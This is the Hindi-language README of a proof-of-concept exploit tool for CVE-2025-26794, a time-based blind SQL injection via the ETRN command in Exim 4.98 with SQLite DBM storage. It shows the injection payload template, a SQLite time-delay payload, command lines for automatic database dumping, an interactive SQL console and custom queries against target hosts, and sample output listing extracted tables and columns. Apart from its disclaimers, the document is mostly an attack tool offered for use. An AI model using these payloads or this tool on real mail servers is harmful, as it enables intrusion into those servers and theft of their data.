
Exim 4.98 में CVE-2025-26794 के लिए SQL injection एक्सप्लॉइट। समय-आधारित ब्लाइंड SQLi के माध्यम से स्वचालित डेटा निष्कर्षण। केवल अधिकृत पेनेट्रेशन परीक्षण के लिए।
CVE-2025-26794 के लिए एक प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट टूल, जो SQLite DBM स्टोरेज का उपयोग करते समय ETRN कमांड के माध्यम से Exim 4.98 मेल सर्वर में SQL इंजेक्शन भेद्यता प्रदर्शित करता है।
केवल अधिकृत सुरक्षा परीक्षण के लिए
यह टूल केवल शैक्षिक उद्देश्यों और अधिकृत पेनेट्रेशन परीक्षण के लिए प्रदान किया गया है। अनधिकृत पहुँच विभिन्न कानूनों के तहत अवैध है, जिनमें शामिल हैं:
किसी भी सिस्टम का परीक्षण करने से पहले आपके पास स्पष्ट लिखित प्राधिकरण होना चाहिए जो आपके स्वामित्व में नहीं है।
लेखक और योगदानकर्ता इस टूल के दुरुपयोग या इससे होने वाली क्षति के लिए कोई दायित्व नहीं मानते हैं।
CVE-2025-26794 Exim 4.98 में एक SQL इंजेक्शन भेद्यता है जो निम्न स्थितियों में उत्पन्न होती है:
यह भेद्यता हमलावरों को अनुमति देती है:
# रिपॉज़िटरी क्लोन करें
git clone https://github.com/XploitGh0st/CVE-2025-26794-exploit.git
cd CVE-2025-26794-exploit
# निर्भरताएँ स्थापित करें (कोई आवश्यक नहीं - केवल मानक लाइब्रेरी का उपयोग करता है)
pip install -r requirements.txt
# स्क्रिप्ट को निष्पादन योग्य बनाएँ (Linux/Mac)
chmod +x exploit.py
python3 exploit.py <target> [options]
python3 exploit.py 192.168.1.10 --test-only
python3 exploit.py mail.example.com --auto-dump
python3 exploit.py 10.0.0.5 --interactive
python3 exploit.py 192.168.1.10 --table users --columns
python3 exploit.py 192.168.1.10 --query "SELECT sqlite_version()"
ETRN #',1); <MALICIOUS_QUERY> /*
पेलोड ETRN सीरियलाइज़ेशन हैंडलर में अनुचित सैनिटाइज़ेशन का फायदा उठाता है, जिससे SQLite क्वेरीज़ में SQL इंजेक्शन की अनुमति मिलती है।
SQLite-विशिष्ट समय विलंब का उपयोग करता है:
SELECT 1 FROM tbl WHERE 1234=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(500000000/2))))
यह स्थिति सत्य होने पर एक मापने योग्य विलंब (~1-2 सेकंड) उत्पन्न करता है।
╔═══════════════════════════════════════════════════════════╗
║ CVE-2025-26794: Exim SQLi Data Extraction Tool ║
║ FOR AUTHORIZED USE ONLY ║
╚═══════════════════════════════════════════════════════════╝
[*] Testing vulnerability...
[+] Normal response time: 0.123s
[+] Delayed response time: 1.456s
[!!!] VULNERABLE - Time difference: 1.333s
[*] Extracting table names...
[*] Extracting table 1...
[+] Extracted: users
[+] Found table: users
[*] Extracting columns from table 'users'...
[+] Found column: id
[+] Found column: username
[+] Found column: email
यदि आप SQLite DBM के साथ Exim 4.98 चला रहे हैं:
एक्सप्लॉइट कैरेक्टर कुशलतापूर्वक निकालने के लिए बाइनरी खोज का उपयोग करता है:
unicode(): कैरेक्टर का ASCII मान प्राप्त करेंsubstr(): परिणाम से सबस्ट्रिंग निकालेंsqlite_master: स्कीमा गणना के लिए सिस्टम तालिकाpragma_table_info(): कॉलम मेटाडेटा निष्कर्षणनिम्नलिखित के लिए योगदान का स्वागत है:
कृपया सुनिश्चित करें कि सभी योगदानों में शामिल हैं:
यह प्रोजेक्ट केवल शैक्षिक उद्देश्यों के लिए जारी किया गया है। जिम्मेदारी और कानूनी रूप से उपयोग करें।
XploitGh0st
यदि आप इस टूल का उपयोग करके भेद्यताएँ खोजते हैं:
याद रखें: महान शक्ति के साथ महान जिम्मेदारी आती है। इस टूल का उपयोग नैतिक और कानूनी रूप से करें।
| विकल्प | विवरण |
|---|
host | लक्ष्य होस्टनाम या IP पता (आवश्यक) |
-p, --port | SMTP पोर्ट (डिफ़ॉल्ट: 25) |
-t, --timeout | सॉकेट टाइमआउट सेकंड में (डिफ़ॉल्ट: 30) |
--threshold | पहचान के लिए समय विलंब सीमा (डिफ़ॉल्ट: 0.8s) |
--test-only | केवल भेद्यता का परीक्षण करें, कोई डेटा निष्कर्षण नहीं |
--auto-dump | डेटाबेस संरचना और डेटा स्वचालित रूप से डंप करें |
--interactive | इंटरैक्टिव SQL क्वेरी कंसोल लॉन्च करें |
--table TABLE | निष्कर्षण के लिए विशिष्ट तालिका लक्षित करें |
--columns | कॉलम नाम निकालें (--table के साथ प्रयोग करें) |
--query QUERY | कस्टम SQL क्वेरी निष्पादित करें |